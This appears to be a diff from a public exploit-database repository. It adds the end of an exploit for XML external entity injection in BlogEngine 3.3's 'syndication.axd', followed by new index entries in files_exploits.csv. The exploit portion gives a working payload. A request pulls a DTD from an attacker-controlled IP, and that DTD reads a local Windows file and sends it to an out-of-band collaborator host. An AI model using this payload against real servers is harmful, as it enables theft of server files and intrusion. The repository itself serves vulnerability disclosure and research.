+http://b5baa301-b569-4bbf-afd9-d2eb264fdcbf.gdsdemo.com/blog/syndication.axd?apml=http://attackerip:8000/miau.txt
+
+miau.txt
+
+-----------------------------
+  <!DOCTYPE foo SYSTEM "
+">http://dgx2pxtwxkvgvkubo7ksvkywtnzhn6.burpcollaborator.net">
+<http://dgx2pxtwxkvgvkubo7ksvkywtnzhn6.burpcollaborator.net>
+-----------------------------
+[image: image.png]
+
+*Attack Pattern 3 (SSRF to XXE Exfiltration):*
+
+miau.txt
+
+-----------------------------
+
+<?xml version="1.0" ?>
+<!DOCTYPE r [
+<!ELEMENT r ANY >
+<!ENTITY % sp SYSTEM "http://37.187.112.19:8000/test1.dtd">
+
+%sp;
+%param1;
+%exfil;
+]>
+-----------------------------
+test1.dtd
+
+-----------------------------
+
+<!ENTITY % data SYSTEM "file:///c:/windows/win.ini">
+<!ENTITY % param1 "<!ENTITY &#x25; exfil SYSTEM '
+http://y76a7hgbrccuyclwxwcp3br74yayyn.burpcollaborator.net/?%data;'>">
+
+-----------------------------

files_exploits.csv

@@ -11066,6 +11066,7 @@ id,file,description,date,author,type,platform,port
 48400,exploits/windows/local/48400.txt,"Druva inSync Windows Client 6.5.2 - Local Privilege Escalation",2020-04-29,"Chris Lyne",local,windows,
 48414,exploits/windows/local/48414.txt,"Outline Service 1.3.3  - 'Outline Service ' Unquoted Service Path",2020-05-04,"Minh Tuan",local,windows,
 48415,exploits/windows/local/48415.py,"Frigate 3.36 - Buffer Overflow (SEH)",2020-05-04,"Xenofon Vassilakopoulos",local,windows,
+48418,exploits/windows/local/48418.txt,"Oracle Database 11g Release 2 - 'OracleDBConsoleorcl' Unquoted Service Path",2020-05-05,"Nguyen Khang",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -18138,6 +18139,7 @@ id,file,description,date,author,type,platform,port
 48363,exploits/windows/remote/48363.py,"Neowise CarbonFTP 1.4 - Insecure Proprietary Password Encryption",2020-04-21,hyp3rlinx,remote,windows,
 48389,exploits/windows/remote/48389.py,"CloudMe 1.11.2 - Buffer Overflow (PoC)",2020-04-28,"Andy Bowden",remote,windows,
 48410,exploits/multiple/remote/48410.rb,"Apache Shiro 1.2.4 - Cookie RememberME Deserial RCE (Metasploit)",2020-05-01,Metasploit,remote,multiple,
+48421,exploits/multiple/remote/48421.txt,"Saltstack 3000.1 - Remote Code Execution",2020-05-05,"Jasper Lievisse Adriaanse",remote,multiple,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -42648,4 +42650,11 @@ id,file,description,date,author,type,platform,port
 48409,exploits/php/webapps/48409.txt,"Online Scheduling System 1.0 - Authentication Bypass",2020-05-01,boku,webapps,php,
 48411,exploits/php/webapps/48411.txt,"BoltWire 6.03 - Local File Inclusion",2020-05-04,"Andrey Stoykov",webapps,php,
 48413,exploits/php/webapps/48413.txt,"osTicket 1.14.1 - Persistent Authenticated Cross-Site Scripting",2020-05-04,"Mehmet Kelepçe",webapps,php,
+48422,exploits/xml/webapps/48422.txt,"BlogEngine 3.3 - 'syndication.axd' XML External Entity Injection",2020-05-05,"Daniel Martinez Adan",webapps,xml,
 48416,exploits/php/webapps/48416.txt,"addressbook 9.0.0.1 - 'id' SQL Injection",2020-05-04,"David Velazquez",webapps,php,
+48417,exploits/php/webapps/48417.txt,"Fishing Reservation System 7.5 - 'uid' SQL Injection",2020-05-05,Vulnerability-Lab,webapps,php,
+48419,exploits/php/webapps/48419.txt,"Online Scheduling System 1.0 - 'username' SQL Injection",2020-05-05,"Saurav Shukla",webapps,php,
+48420,exploits/php/webapps/48420.txt,"webERP 4.15.1 - Unauthenticated Backup File Access",2020-05-05,Besim,webapps,php,
+48423,exploits/php/webapps/48423.txt,"PhreeBooks ERP 5.2.5 - Remote Command Execution",2020-05-05,Besim,webapps,php,
+48424,exploits/php/webapps/48424.txt,"SimplePHPGal 0.7 - Remote File Inclusion",2020-05-05,h4shur,webapps,php,
+48425,exploits/hardware/webapps/48425.txt,"NEC Electra Elite IPK II WebPro 01.03.01 - Session Enumeration",2020-05-05,"Cold z3ro",webapps,hardware,